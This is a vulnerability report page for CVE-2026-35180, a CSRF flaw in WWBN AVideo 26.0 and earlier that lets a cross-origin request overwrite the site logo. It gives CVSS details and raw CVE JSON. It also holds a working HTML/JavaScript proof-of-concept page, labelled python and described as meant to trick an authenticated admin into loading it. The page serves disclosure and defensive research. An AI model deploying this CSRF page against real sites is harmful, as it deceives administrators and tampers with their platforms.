Security Vulnerability Report
中文
CVE-2026-35180 CVSS 4.3 MEDIUM

CVE-2026-35180

Published: 2026-04-06 20:16:26
Last Modified: 2026-04-15 18:42:30

Description

WWBN AVideo is an open source video platform. In versions 26.0 and prior, the site customization endpoint at admin/customize_settings_nativeUpdate.json.php lacks CSRF token validation and writes uploaded logo files to disk before the ORM's domain-based security check executes. Combined with SameSite=None cookie policy, a cross-origin POST can overwrite the platform's logo with attacker-controlled content.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-35180 Description: This HTML page demonstrates a CSRF attack that attempts to overwrite the platform logo. Usage: Host this file and trick an authenticated admin into visiting it. --> <html> <body> <script> function attack() { var url = "https://[TARGET_DOMAIN]/admin/customize_settings_nativeUpdate.json.php"; var formData = new FormData(); // The attacker's malicious logo file formData.append("logo", document.getElementById("fileInput").files[0]); // Additional required parameters based on traffic analysis (example names) formData.append("submit", "Update"); var xhr = new XMLHttpRequest(); xhr.open("POST", url, true); // Browser automatically sends cookies if SameSite=None and Secure xhr.withCredentials = true; xhr.onload = function () { console.log("Attack status:", xhr.status); }; xhr.send(formData); } </script> <!-- Auto-submit trigger could be added here or via user interaction --> <h3>CSRF PoC Demo</h3> <input type="file" id="fileInput" value="malicious_logo.png"> <button onclick="attack()">Submit Request</button> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35180", "sourceIdentifier": "[email protected]", "published": "2026-04-06T20:16:26.237", "lastModified": "2026-04-15T18:42:29.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the site customization endpoint at admin/customize_settings_nativeUpdate.json.php lacks CSRF token validation and writes uploaded logo files to disk before the ORM's domain-based security check executes. Combined with SameSite=None cookie policy, a cross-origin POST can overwrite the platform's logo with attacker-controlled content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5572-2jgx-fc7c", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}